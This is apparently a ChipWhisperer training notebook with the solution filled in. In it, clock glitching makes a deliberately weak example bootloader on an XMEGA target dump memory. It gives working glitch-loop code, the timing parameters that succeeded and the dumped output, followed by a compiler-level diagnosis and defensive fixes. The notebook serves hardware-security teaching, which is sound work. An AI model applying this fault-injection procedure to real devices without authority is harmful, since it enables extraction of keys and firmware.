Part 1, Topic 3: Clock Glitching to Dump Memory (MAIN)

SUMMARY: In the previous lab, we learned how clock glitching can be used to get a microcontroller to skip a password check. This time, we’ll look at a more practical example: getting an example bootloader to dump a large chunk of memory.

LEARNING OUTCOMES:

  • Applying previous glitch settings to new firmware

  • Checking for success and failure when glitching

  • Understanding how compiler optimizations can cause devices to behave in strange ways

The Situation

Now that we’ve got our feet wet with glitching, we’re going to try something a bit more realistic: an “encrypted” bootloader (it’s actually just rot-13, but we’ll pretend it’s unbreakable encryption), where we make as few assumptions as possible. Our goal will be to get that bootloader to decrypt the data and send it back to us. Here’s what we know about the bootloader:

  1. The 'p' command is used to write encrypted firmware to the device. It takes in an encrypted ASCII-encoded string, terminated with a newline. Our first chunk of firmware is "516261276720736265747267206762206f686c207a76797821".

  2. It does something to it (presumably unencrypts it, authenticates it, etc. and writes it to memory)

  3. It sends back an error code of "r000000\n"

Of immediate interest is that error code. That’s the only time the bootloader communicates back with us, so attacking there is a good place to start. One thing that we’ll assume is that we’ve got a trigger right before the error code is sent back to us. This is just a simple trigger_high() call, but we could also trigger on an IO line (better with the CW1200 Pro) or with a SAD trigger on a power trace (CW1200 Pro only). We’ve got a place to start, but let’s see if we can learn more about the bootloader first.

In [1]:

SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'

In [2]:

%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

Out [2]:

rm -f -- bootloader-CWLITEXMEGA.hex
rm -f -- bootloader-CWLITEXMEGA.eep
rm -f -- bootloader-CWLITEXMEGA.cof
rm -f -- bootloader-CWLITEXMEGA.elf
rm -f -- bootloader-CWLITEXMEGA.map
rm -f -- bootloader-CWLITEXMEGA.sym
rm -f -- bootloader-CWLITEXMEGA.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- bootloader.s decryption.s XMEGA_AES_driver.s uart.s usart_driver.s xmega_hal.s
rm -f -- bootloader.d decryption.d XMEGA_AES_driver.d uart.d usart_driver.d xmega_hal.d
rm -f -- bootloader.i decryption.i XMEGA_AES_driver.i uart.i usart_driver.i xmega_hal.i
.
Welcome to another exciting ChipWhisperer target build!!
avr-gcc.exe (WinAVR 20100110) 4.3.3

Copyright (C) 2008 Free Software Foundation, Inc.

This is free software; see the source for copying conditions.  There is NO

warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.



.
Compiling C: bootloader.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/bootloader.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/bootloader.o.d bootloader.c -o objdir/bootloader.o
.
Compiling C: decryption.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/decryption.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/decryption.o.d decryption.c -o objdir/decryption.o
.
Compiling C: .././hal/xmega/XMEGA_AES_driver.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/XMEGA_AES_driver.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/XMEGA_AES_driver.o.d .././hal/xmega/XMEGA_AES_driver.c -o objdir/XMEGA_AES_driver.o
.
Compiling C: .././hal/xmega/uart.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/uart.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/uart.o.d .././hal/xmega/uart.c -o objdir/uart.o
.
Compiling C: .././hal/xmega/usart_driver.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/usart_driver.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/usart_driver.o.d .././hal/xmega/usart_driver.c -o objdir/usart_driver.o
.
Compiling C: .././hal/xmega/xmega_hal.c
avr-gcc -c -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/xmega_hal.lst -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/xmega_hal.o.d .././hal/xmega/xmega_hal.c -o objdir/xmega_hal.o
.
Linking: bootloader-CWLITEXMEGA.elf
avr-gcc -mmcu=atxmega128d3 -I. -fpack-struct -gdwarf-2 -DHAL_TYPE=HAL_xmega -DPLATFORM=CWLITEXMEGA -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/bootloader.o -I.././hal -I.././hal/xmega -I.././crypto/ -std=gnu99  -MMD -MP -MF .dep/bootloader-CWLITEXMEGA.elf.d objdir/bootloader.o objdir/decryption.o objdir/XMEGA_AES_driver.o objdir/uart.o objdir/usart_driver.o objdir/xmega_hal.o --output bootloader-CWLITEXMEGA.elf -Wl,-Map=bootloader-CWLITEXMEGA.map,--cref   -lm
.
Creating load file for Flash: bootloader-CWLITEXMEGA.hex
avr-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature bootloader-CWLITEXMEGA.elf bootloader-CWLITEXMEGA.hex
.
Creating load file for EEPROM: bootloader-CWLITEXMEGA.eep
avr-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" --change-section-lma .eeprom=0 --no-change-warnings -O ihex bootloader-CWLITEXMEGA.elf bootloader-CWLITEXMEGA.eep || exit 0
.
Creating Extended Listing: bootloader-CWLITEXMEGA.lss
avr-objdump -h -S -z bootloader-CWLITEXMEGA.elf > bootloader-CWLITEXMEGA.lss
.
Creating Symbol Table: bootloader-CWLITEXMEGA.sym
avr-nm -n bootloader-CWLITEXMEGA.elf > bootloader-CWLITEXMEGA.sym
Size after:
   text        data     bss     dec     hex filename

   1540         124     120    1784     6f8 bootloader-CWLITEXMEGA.elf

+--------------------------------------------------------
+ Default target does full rebuild each time.
+ Specify buildtarget == allquick == to avoid full rebuild
+--------------------------------------------------------
+--------------------------------------------------------
+ Built for platform CW-Lite XMEGA with:
+ CRYPTO_TARGET = NONE
+ CRYPTO_OPTIONS = AES128C
+--------------------------------------------------------

In [3]:

%run "../../Setup_Scripts/Setup_Generic.ipynb"

Out [3]:

Serial baud rate = 38400
INFO: Found ChipWhisperer😍

In [4]:

fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:

cw.program_target(scope, prog, fw_path)

Out [5]:

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 1663 bytes

The first thing we’ll do is some simple power analysis to see what the device is doing when it sends data back to us. Serial communication is pretty slow, so set the ChipWhisperer to capture around 24k samples with a “x1” ADC clock.

In [6]:

scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 24000

Next, capture a power trace. The string "p516261276720736265747267206762206f686c207a76797821\n" will send the bootloader the first chunk of code and plot it. If you don’t see the full serial message, you can increase scope.adc.decimate, which will throw out every nth ADC sample.

In [7]:

scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
if ret:
    print("Timeout")
trace = scope.get_last_trace()

%matplotlib inline
import matplotlib.pyplot as plt
plt.figure()
plt.plot(trace)
plt.show()

Out [7]:

../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png

It doesn’t look like anything too crazy is going on here - it’s probably just printing some characters in a loop. Some ideas:

  • If we glitch at the beginning of the loop, we might be able to corrupt the loop length variable and get it to print some extra memory

  • We might be able to corrupt the loop variable and get it to read past where it’s supposed to

Try selecting a few hundred cycles at the beginning and end of the loop.

HINT: The last part of the loop should be near the beginning of the last power spike.

HINT: If you’re really stuck on where the serial print ends, you can find the time between the ``trigger_high()`` and ``trigger_low()`` call with ``scope.adc.trig_count``.

In [8]:

print(scope.adc.trig_count)

Out [8]:

9645

In [9]:

glitch_spots = [i for i in range(1)]
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
glitch_spots.extend([i for i in range(16980, 17020, 1)])
if PLATFORM == "CWLITEXMEGA":
    glitch_spots.extend([i for i in range(9500, 9650, 1)])
# ###################
# END SOLUTION
# ###################

In [10]:

print(glitch_spots)

Out [10]:

[0, 16980, 16981, 16982, 16983, 16984, 16985, 16986, 16987, 16988, 16989, 16990, 16991, 16992, 16993, 16994, 16995, 16996, 16997, 16998, 16999, 17000, 17001, 17002, 17003, 17004, 17005, 17006, 17007, 17008, 17009, 17010, 17011, 17012, 17013, 17014, 17015, 17016, 17017, 17018, 17019, 9500, 9501, 9502, 9503, 9504, 9505, 9506, 9507, 9508, 9509, 9510, 9511, 9512, 9513, 9514, 9515, 9516, 9517, 9518, 9519, 9520, 9521, 9522, 9523, 9524, 9525, 9526, 9527, 9528, 9529, 9530, 9531, 9532, 9533, 9534, 9535, 9536, 9537, 9538, 9539, 9540, 9541, 9542, 9543, 9544, 9545, 9546, 9547, 9548, 9549, 9550, 9551, 9552, 9553, 9554, 9555, 9556, 9557, 9558, 9559, 9560, 9561, 9562, 9563, 9564, 9565, 9566, 9567, 9568, 9569, 9570, 9571, 9572, 9573, 9574, 9575, 9576, 9577, 9578, 9579, 9580, 9581, 9582, 9583, 9584, 9585, 9586, 9587, 9588, 9589, 9590, 9591, 9592, 9593, 9594, 9595, 9596, 9597, 9598, 9599, 9600, 9601, 9602, 9603, 9604, 9605, 9606, 9607, 9608, 9609, 9610, 9611, 9612, 9613, 9614, 9615, 9616, 9617, 9618, 9619, 9620, 9621, 9622, 9623, 9624, 9625, 9626, 9627, 9628, 9629, 9630, 9631, 9632, 9633, 9634, 9635, 9636, 9637, 9638, 9639, 9640, 9641, 9642, 9643, 9644, 9645, 9646, 9647, 9648, 9649]

Evaluating Success

Detecting whether our glitch was successful or not isn’t quite as trivial as in the previous lab - we don’t have a nice error return that the device calculates and sends back to us. One idea is that we can look for part of the string that we sent to the device: there isn’t much time between us sending it and the error code being returned. With any luck the compiler will have placed both values close in memory.

Now the rest is up to you! Use what you learned in the previous lab to setup glitch settings and a glitch loop. Here’s a few hints to make things easier:

  1. Try to use a fairly small width and offset range since we’ll need to scan ext_offset as well here. A total range of ~2-3 for each with 0.4 steps is a good range to aim for.

  2. Try looking for a part of the string we sent to the device to check for success.

  3. You may want to forgo graphing or plot only successes/crashes if it makes things substantially slower - we’re scanning a large range of glitch settings so we’ll need all the speed we can get.

Get your glitch all setup here:

In [11]:

scope.adc.timeout = 0.1
if PLATFORM == "CWLITEXMEGA":
    def reboot_flush():
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    def reboot_flush():
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = True
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

scope.glitch.clk_src = 'clkgen'
scope.glitch.trigger_src = 'ext_single'
scope.glitch.repeat = 1
scope.glitch.output = "clock_xor"
scope.io.hs2 = "glitch"

def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n":
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

In [12]:

import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset"])
gc.display_stats()


fig = plt.figure()
plt.plot(-48, 48, ' ')
plt.plot(48, -48, ' ')
plt.plot(-48, -48, ' ')
plt.plot(48, 48, ' ')

Out [12]:

[<matplotlib.lines.Line2D at 0x276c843ff48>]
../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png

Finally, create a glitch loop. Don’t forget to check all the different glitch_spots as well!

In [13]:

from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct
# ###################

gc.set_range("width", 3, 14)
gc.set_range("offset", -14.5, -13)

gc.set_range("width", 46, 49.8)
gc.set_range("offset", -46, -49.8)
step = 2
gc.set_global_step(step)
scope.glitch.repeat = 4

broken = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    if broken:
        break
    for i in tqdm(glitch_spots, leave=False):
        scope.glitch.ext_offset = i
        if broken:
            break
        if scope.adc.state:
            #print("Timeout, trigger still high!")
            gc.add("reset", (scope.glitch.width, scope.glitch.offset))
            plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
            fig.canvas.draw()

            #Device is slow to boot?
            reboot_flush()
        target.flush()
        scope.arm()
        target.write("p516261276720736265747267206762206f686c207a76797821\n")
        ret = scope.capture()
        if ret:
            #print('Timeout - no trigger')
            gc.add("reset", (scope.glitch.width, scope.glitch.offset))
            plt.plot(scope.glitch.width, scope.glitch.ext_offset, 'xr', alpha=1)
            fig.canvas.draw()

            #Device is slow to boot?
            reboot_flush()
        else:
            time.sleep(0.05)
            output = target.read(timeout=2)
            if "767" in output:
                print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(i, scope.glitch.offset, scope.glitch.width))
                plt.plot(scope.glitch.width, scope.glitch.ext_offset, '+g')
                gc.add("success", (scope.glitch.width, scope.glitch.offset))
                fig.canvas.draw()
                broken = True
                for __ in range(500):
                    num_char = target.in_waiting()
                    if num_char:
                        my_print(output)
                        output = target.read(timeout=50)
                time.sleep(1)
                break
            else:
                gc.add("normal", (scope.glitch.width, scope.glitch.offset))

Out [13]:

WARNING:root:Negative offsets <-45 may result in double glitches!
WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred.
Glitched!
    Ext offset: 9629
    Offset: -49.609375
    Width: 46.09375
o0





6720736265747267206762206f686c207a767978210x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00Don't forget to buy milk!
WARNING:root:Negative offsets <-45 may result in double glitches!
../_images/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png

Diagnosing the Fault

As you can see by the output, the bootloader has suffered a pretty catastrophic failure! Not only has it spilled the secret, it’s also dumped a whole bunch more memory. For a real bootloader, there’s probably some pretty juicy stuff in there like encryption keys or previously decrypted firmware. Let’s start by taking a look at the C source code that sends the error code back:

trigger_high();

int i;
for(i = 0; i < ascii_idx; i++)
{
    putch(ascii_buffer[i]);
}
trigger_low();
state = IDLE;

Nothing really looks too unusual here. Before we take a look at the assembly and figure out what went wrong, let’s try to make some guesses:

  • Maybe the glitch corrupted the ascii_idx variable

    • The glitch happened near the end of the loop. It’s unlikely the end of loop counter would be reloaded during the loop

  • Maybe we skipped the last i < ascii_idx check

    • The glitch caused a lot of memory to be dumped. If we just skipped the last check it should only print an extra character

  • i is a signed integer: maybe we corrupted it into being a really large negative number.

That last one seems to be our best theory, so let’s go with that.

The Answer

Let’s check the assembly for our booloader. No need to decompile the binary or recompile to assembly, since there’s also a listing file created as part of the build process (*.lss). This file also contains C, so it makes it easy to search (try something like the trigger_high() call). You might notice that instead of doing a less than or equal or less than comparison like was in our C code, the compiler has instead inserted a not equal comparison instead! This means our original guess may not have been correct, as our assumption about what would happen if the last i < ascii_idx was skipped doesn’t hold. In fact, it’s a lot more likely that the last check was skipped (or i was set to some large value) than flipping a particular bit.

This is actually a pretty unexpected change for the compiler to make, espcially since less than, greater than, and not equal are nearly identical instructions in terms of implementation and have both the same instruction size and speed. This showcases an important fact: the C code that you write is not directly translated to assembly. It needs to go through the compiler first, which may drastically change the intended logic of the program.

Now that we know what happened, let’s look at some ways to fix it.

1. Volatile variables

C includes a keyword for variables called volatile, which indicates that the variable may change between accesses and therefore should not have optimizations applied to it. A typical use case for volatile is for peripheral registers on embedded devices. It would be really bad, for example, if you were trying to wait for an IO pin to go high in your code, but the compiler decided it would be faster to only check it only once and assume it doesn’t change!

Try replacing int i = 0; before the print look with volatile int i = 0;, recompile, and check the listing file. Is there any other unexpected changes? What about if you consider the use case above (i.e. if i was a register instead of a loop variable)? Is there any way the attack might still work? If so, how might you mitigate this?

2. Unrolling the loop

Another potential way of solving this issue would be to manually unroll the loop. The message being printed by the bootloader is a constant length of 7 characters, so we could instead write:

int i;
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);
putch(ascii_buffer[i++]);

In fact, this is something the compiler might do on its own to optimize the code, since unrolling a loop like this is faster than the loop version. It’s not a good idea to blindly rely on this, however, since the compiler could choose not to make this optimization as well and might change it between builds.

3. Checking for invalid characters

Another thing to consider is that the message from the bootloader only has a limited range of characters that it prints. We could instead construct a “safe print” function that only prints newlines, 'r' and ASCII digits (i.e. '0' to '9'):

int safe_print(char c)
{
    if ((c == '\n') ||
       ((c >= '0') && (c <= '9')) ||
       (c == 'r')) {
        putch(c);
        return 0;
    }
    return -1; //uh oh!
}

It we went this route, it would be a good idea to make the error return a separate buffer with a bunch of null characters at the end.

4. More generic methods

More generic ways of defending against glitch attacks (memory guards, for example) are also discussed in the training slides.

In [14]:

scope.dis()
target.dis()

In [15]:

assert broken is True